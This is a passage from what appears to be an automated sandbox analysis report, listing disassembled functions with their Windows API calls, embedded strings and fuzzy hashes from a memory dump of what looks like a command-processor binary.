                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: FileLockShared$AcquirePointerReadRelease$ByteCharMultiWidememcmp
                                                                      • String ID:
                                                                      • API String ID: 2002953238-0
                                                                      • Opcode ID: 80e777392585222ba4c4fcf9e2de71391a7fec1ffd0c5c9693723e65396d7460
                                                                      • Instruction ID: 8a8ea936f7e9bbc06edc3a373f84735407c6b19554ea93f2952426bbda55fcb7
                                                                      • Opcode Fuzzy Hash: 80e777392585222ba4c4fcf9e2de71391a7fec1ffd0c5c9693723e65396d7460
                                                                      • Instruction Fuzzy Hash: FA51E371A44204AFEB618F68DC48BAE7BFAFB42710F18816AF955DB290D7B44D40CB52
                                                                      Function 0004C897 Relevance: 15.1, APIs: 10, Instructions: 119fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(?,00000001,0007A7F0,00000000,?,00000200), ref: 0004C818
                                                                      • wcschr.MSVCRT ref: 0004C882
                                                                      • _get_osfhandle.MSVCRT ref: 0004C8BA
                                                                      • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 0004C8C4
                                                                      • _get_osfhandle.MSVCRT ref: 0004C8DB
                                                                      • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 0004C8ED
                                                                      • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000000,00000001), ref: 0004C90D
                                                                      • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00088E04), ref: 0004C91E
                                                                      • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0007A7F0,00000200,00000000,00000000), ref: 0004C934
                                                                      • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00088E04), ref: 0004C941
                                                                      • _get_osfhandle.MSVCRT ref: 0004CAC4
                                                                      • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 0004CACE
                                                                      • memcmp.MSVCRT(0007A7F0,000434F8,00000003), ref: 0005D16E
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: File$Pointer_get_osfhandle$LockShared$AcquireByteCharMultiReadReleaseTypeWidememcmpwcschr
                                                                      • String ID:
                                                                      • API String ID: 1383533039-0
                                                                      • Opcode ID: 2430d980d2027e539a0c8acb0ac28971b42a1485055a574ee9fd2859faf97c9f
                                                                      • Instruction ID: 978ebce86d0e6629b66b4ea8c57bbeba5ddafb992ebccd8dc9d23cee4bb18ff7
                                                                      • Opcode Fuzzy Hash: 2430d980d2027e539a0c8acb0ac28971b42a1485055a574ee9fd2859faf97c9f
                                                                      • Instruction Fuzzy Hash: D04109B0A013145BFFB08F248C89FA976B6BB45705F1800ABF509E7190DBBA4D95CF5A
                                                                      Function 00050444 Relevance: 15.1, APIs: 5, Strings: 5, Instructions: 97COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: _wcsicmp
                                                                      • String ID: CMDEXTVERSION$DEFINED$ERRORLEVEL$EXIST$NOT
                                                                      • API String ID: 2081463915-1668778490
                                                                      • Opcode ID: 8aec77f6b02d3757cd909b514e9f8078eb6f4f723bae5ee32c8ee7fd459c59a6
                                                                      • Instruction ID: 149e596ed3f67e358a90da426b779e5099cbb1616f9163c24eb8ea7f0895b0d9
                                                                      • Opcode Fuzzy Hash: 8aec77f6b02d3757cd909b514e9f8078eb6f4f723bae5ee32c8ee7fd459c59a6
                                                                      • Instruction Fuzzy Hash: 5521DDF13097065AFB7C1B24A81677F26D8DB85356F64442EF982850C2FEB888448B2A
                                                                      Function 00064953 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 260timeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _get_osfhandle.MSVCRT ref: 00064A7B
                                                                      • GetLocalTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,00000002,?), ref: 00064B98
                                                                      • SetLocalTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?), ref: 00064BC5
                                                                      • SetLocalTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?), ref: 00064BD2
                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00064BDC
                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 00064C30
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: LocalTime$ErrorLast$_get_osfhandle
                                                                      • String ID: %s$/-.
                                                                      • API String ID: 1033501010-531045382
                                                                      • Opcode ID: b66894165db5157c3032f7e1783864b3a3685b25e0c8b27cc4a43469c8cc7c18
                                                                      • Instruction ID: 54b51e162f8784d3ab0e5eace72651afa65e95b4472273f3b7cb3c16fd9c91e1
                                                                      • Opcode Fuzzy Hash: b66894165db5157c3032f7e1783864b3a3685b25e0c8b27cc4a43469c8cc7c18
                                                                      • Instruction Fuzzy Hash: CF814372B4020596EB64AFB8CC46AFF33E6EF85710F14416AE402DB291EF75DE448719
                                                                      Function 00066650 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 214registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,02000000,?), ref: 00066745
                                                                      • RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,00000000,02000000,00000000,?,?), ref: 000667CF
                                                                      • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 000667F6
                                                                      • RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,000420B8,00000000,00000002,?,00000000), ref: 00066867
                                                                      • RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000), ref: 000668A3
                                                                      • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 000668C5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: CloseValue$CreateDeleteOpen
                                                                      • String ID: %s=%s$\Shell\Open\Command
                                                                      • API String ID: 4081037667-3301834661
                                                                      • Opcode ID: 20c1f52f522131a83b1409e0890470cc360e94304dd0e51d4b6abc02ef90900e
                                                                      • Instruction ID: c2562e9a2bf671d0c383c3ddab3001ebb408696351fd2973d675180b4418da11
                                                                      • Opcode Fuzzy Hash: 20c1f52f522131a83b1409e0890470cc360e94304dd0e51d4b6abc02ef90900e
                                                                      • Instruction Fuzzy Hash: 7961E875A401259BEB349B28CC49AFB77FAEF54700F1401BAF849E7251EE728E44C6A1
                                                                      Function 000664DB Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 128registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,0006CD00,00000018,?,?,0005BFD6), ref: 0006650F
                                                                      • RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(00000000,00000000,00000000,00000001,?,00000000,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,0006CD00), ref: 00066545
                                                                      • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(00000000,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,0006CD00,00000018,?,?,0005BFD6), ref: 00066553
                                                                      • RegDeleteKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,0006CD00,00000018,?,?,0005BFD6), ref: 00066590
                                                                      • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,02000000,?,?,?,00000000,00000000,0006CD00,00000018,?,?,0005BFD6), ref: 000665AD
                                                                      • RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,000420B8,?,00000000,02000000,?,?,?,00000000,00000000,0006CD00,00000018,?,?,0005BFD6), ref: 000665D4
                                                                      • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,02000000,?,?,?,00000000,00000000,0006CD00,00000018,?,?,0005BFD6), ref: 000665EF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: CloseDeleteValue$CreateOpen
                                                                      • String ID: %s=%s
                                                                      • API String ID: 1019019434-1087296587
                                                                      • Opcode ID: dda1107c735c3508ce7050fb44712ef17bcdcc983dc4228149d9fa389789343a
                                                                      • Instruction ID: 9008c3c72547e6fceb3f552388d59ffc7f4277f25351a591c2d78788f7e841f7
                                                                      • Opcode Fuzzy Hash: dda1107c735c3508ce7050fb44712ef17bcdcc983dc4228149d9fa389789343a
                                                                      • Instruction Fuzzy Hash: 5641B671D04625ABEB315B55DC0AEAF7AB9FB85B50F00412AF80677251D7374D01CBA4
                                                                      Function 00047150 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 119COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: _wcsnicmpswscanf
                                                                      • String ID: :EOF
                                                                      • API String ID: 1534968528-551370653
                                                                      • Opcode ID: 56f0fc7e54f215ae531031c0c669c74e24ef71f9823080d782d15aaa086620d2
                                                                      • Instruction ID: 5acc09cbe7cf287dc52035afbc7fc99aba7a4f0ff22a4a934a0c71ae1e4e63db
                                                                      • Opcode Fuzzy Hash: 56f0fc7e54f215ae531031c0c669c74e24ef71f9823080d782d15aaa086620d2
                                                                      • Instruction Fuzzy Hash: 3D313BB1A042105BEB606B189C49B7A77D4EF46750F044035FD8A972A2DB7C9C45C769
                                                                      Function 00066035 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 113libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadLibraryExW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(NTDLL.DLL,00000000,00000000,?,00000000,?), ref: 00066069
                                                                      • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,NtQueryInformationProcess), ref: 0006607E
                                                                      • ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,?,00000480,?), ref: 000660DC
                                                                      • ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,?,00000004,00000000), ref: 00066128
                                                                      • ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,?,00000002,00000000), ref: 0006614F
                                                                      • ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,00000000,?,00000002,00000000), ref: 00066186
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: MemoryProcessRead$AddressLibraryLoadProc
                                                                      • String ID: NTDLL.DLL$NtQueryInformationProcess
                                                                      • API String ID: 1580871199-2613899276
                                                                      • Opcode ID: 2b491f3bd3d733ceb77ae40969cf10cd2b9ed5fd43f2e69e021fc770d2c196ab
                                                                      • Instruction ID: 76939fc2d7d5b65e9943274d0352183f401aab3966134eeac2a69fc5581aa08f
                                                                      • Opcode Fuzzy Hash: 2b491f3bd3d733ceb77ae40969cf10cd2b9ed5fd43f2e69e021fc770d2c196ab
                                                                      • Instruction Fuzzy Hash: 3D41B6B0A00219ABFB209B24CC88FBF76BDFB02744F0441A9E605E7281DB349E45CF65
                                                                      Function 0005654B Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 107fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _wcsicmp.MSVCRT ref: 000565A4
                                                                      • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,80000000,00000001,00000000,00000003,08000080,00000000), ref: 000565D7
                                                                      • _open_osfhandle.MSVCRT ref: 000565EB
                                                                      • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000,?), ref: 00062092
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: CloseCreateFileHandle_open_osfhandle_wcsicmp
                                                                      • String ID: con
                                                                      • API String ID: 689241570-4257191772
                                                                      • Opcode ID: 2766e244311e8d6a862aeb426b4d57239c018cc4ba80a40f94b04db85b719c32
                                                                      • Instruction ID: bf139c08c3caa9a8aa5435e20ebbc154d8581d09d5f3864a40789a1a88fc7c32
                                                                      • Opcode Fuzzy Hash: 2766e244311e8d6a862aeb426b4d57239c018cc4ba80a40f94b04db85b719c32
                                                                      • Instruction Fuzzy Hash: B3315872A44600AFF7349BA89C49B6F7BE9E741376F30422AE852E31C0EB799D04C751
                                                                      Function 000661A2 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98memoryfileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00000104), ref: 000661D7
                                                                      • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,00000000,00000000,00000040), ref: 00066211
                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,00000014,00000004), ref: 00066254
                                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 0006625B
                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?), ref: 0006628D
                                                                      • RtlFreeHeap.NTDLL(00000000), ref: 00066294
                                                                      • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000,00000040), ref: 0006629B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$FileProcess$AllocCloseCreateFreeHandlePointer
                                                                      • String ID: PE
                                                                      • API String ID: 3093239467-4258593460
                                                                      • Opcode ID: 19a719d163305ea2994ea93eced1aa025bdec4d15d3510a1c2b79cb1258cae12
                                                                      • Instruction ID: c504367992ad8b50f2c4aa564d69c6cd88de710f724ba97acf74fa19f6f20d26
                                                                      • Opcode Fuzzy Hash: 19a719d163305ea2994ea93eced1aa025bdec4d15d3510a1c2b79cb1258cae12
                                                                      • Instruction Fuzzy Hash: 7131E534B00715ABFF106BA28C29FBE77ABAFC9B11F044205F951E62C0DB799D06C661
                                                                      Function 0004802C Relevance: 13.7, APIs: 9, Instructions: 175COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • memset.MSVCRT ref: 00048060
                                                                        • Part of subcall function 0004E3F0: memset.MSVCRT ref: 0004E455
                                                                      • ??_V@YAXPAX@Z.MSVCRT(?,-00000001,00000000,?,00000000), ref: 000481BE
                                                                        • Part of subcall function 0004DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0004ACD8,00000001,?,00000000,00048C23,-00000105,0006C9B0,00000240,00051E92,00000000,00000000,0005ACE0,00000000), ref: 0004DCE1
                                                                        • Part of subcall function 0004DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0004ACD8,00000001,?,00000000,00048C23,-00000105,0006C9B0,00000240,00051E92,00000000,00000000,0005ACE0,00000000,00000000), ref: 0004DCE8
                                                                      • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00000000,-00000001,00000000,?,00000000), ref: 0004818C
                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00048197
                                                                      • longjmp.MSVCRT(00080A30,00000001,-00000001,00000000,?,00000000), ref: 0005B09E
                                                                      • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00067FC9,?,000699AE,00000000,?,00000000,0005CF94,00000000,?), ref: 0005B0AB
                                                                      • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00067FC9,?,000699AE,00000000,?,00000000,0005CF94,00000000,?), ref: 0005B0C1
                                                                      • fprintf.MSVCRT ref: 0005B0D5
                                                                      • fflush.MSVCRT ref: 0005B0E3
                                                                        • Part of subcall function 00048F21: _wcsicmp.MSVCRT ref: 00048FCD
                                                                        • Part of subcall function 00048F21: _wcsicmp.MSVCRT ref: 00048FE3
                                                                        • Part of subcall function 00048F21: GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00049002
                                                                        • Part of subcall function 00048F21: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00049013
                                                                        • Part of subcall function 00048E9E: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,00088BF0,00000000,?), ref: 00048EC3
                                                                        • Part of subcall function 00051CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,?,000480F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00051D3A
                                                                        • Part of subcall function 00051CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,000480F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00051D44
                                                                        • Part of subcall function 00051CD5: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,?,00000000,?,000480F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00051D57
                                                                        • Part of subcall function 00051CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,000480F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00051D61
                                                                        • Part of subcall function 000501F5: wcsrchr.MSVCRT ref: 000501FB
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: Error$Mode$AttributesCriticalFileHeapLastSection_wcsicmpmemset$AllocCurrentDirectoryEnterFullLeaveNamePathProcessfflushfprintflongjmpwcsrchr
                                                                      • String ID:
                                                                      • API String ID: 3753564779-0
                                                                      • Opcode ID: fe2a480e0ddcf1e11fea2b5ccc1b4eb4e0740763bcdd041d52361e4bd8db7385
                                                                      • Instruction ID: d1f5cbb01a0ef6aa901d125252fa76a4d98349f4fe5c37018b2f627995a66160
                                                                      • Opcode Fuzzy Hash: fe2a480e0ddcf1e11fea2b5ccc1b4eb4e0740763bcdd041d52361e4bd8db7385
                                                                      • Instruction Fuzzy Hash: 715103B0B002119BEB249BB4EC55AAF77F4FF04310F14483AF94AE7292DB389981CB55
                                                                      Function 000538D0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 247COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: memset
                                                                      • String ID: %s
                                                                      • API String ID: 2221118986-3043279178
                                                                      • Opcode ID: a5942d24b404a9e74bb9895f90449c1578ccdeeee121bccc0b0efffcfea79b9b
                                                                      • Instruction ID: a0d330ec8aba113bc713f3a8c33098a6fe654ecd1836f8c04ae35333dc6b6a08
                                                                      • Opcode Fuzzy Hash: a5942d24b404a9e74bb9895f90449c1578ccdeeee121bccc0b0efffcfea79b9b
                                                                      • Instruction Fuzzy Hash: 6A917F716083429BE770DF10D855BBBB3E4BF94346F00092DE98997191EB78EA48CB53
                                                                      Function 000531EA Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 73COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: wcschr$iswdigit
                                                                      • String ID: +-~!$<>+-*/%()|^&=,
                                                                      • API String ID: 2770779731-632268628
                                                                      • Opcode ID: 2742dfd6fdf0417355fe36863d37c97f919e54a64a55315f2f08a0103a30f32d
                                                                      • Instruction ID: 3eac49f58bdf6255a217b961e6dd413bafc87bd59e7424cc45760bc1da880e91
                                                                      • Opcode Fuzzy Hash: 2742dfd6fdf0417355fe36863d37c97f919e54a64a55315f2f08a0103a30f32d
                                                                      • Instruction Fuzzy Hash: DF119172304A129FA7649F6ADC44877B7E8FF9B7B2720002EF980D7650EB29DD058664
                                                                      Function 000449F8 Relevance: 12.2, APIs: 8, Instructions: 187COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00049A11: _get_osfhandle.MSVCRT ref: 00049A1C
                                                                        • Part of subcall function 00049A11: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0004793A,00000104,?), ref: 00049A2B
                                                                        • Part of subcall function 00049A11: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,00047908,00002374,-00000001), ref: 00049A47
                                                                        • Part of subcall function 00049A11: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00088E04,00000002,?,?,?,?,?,?,?,?,?,?,?,?,00047908,00002374), ref: 00049A56
                                                                        • Part of subcall function 00049A11: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00047908,00002374), ref: 00049A61
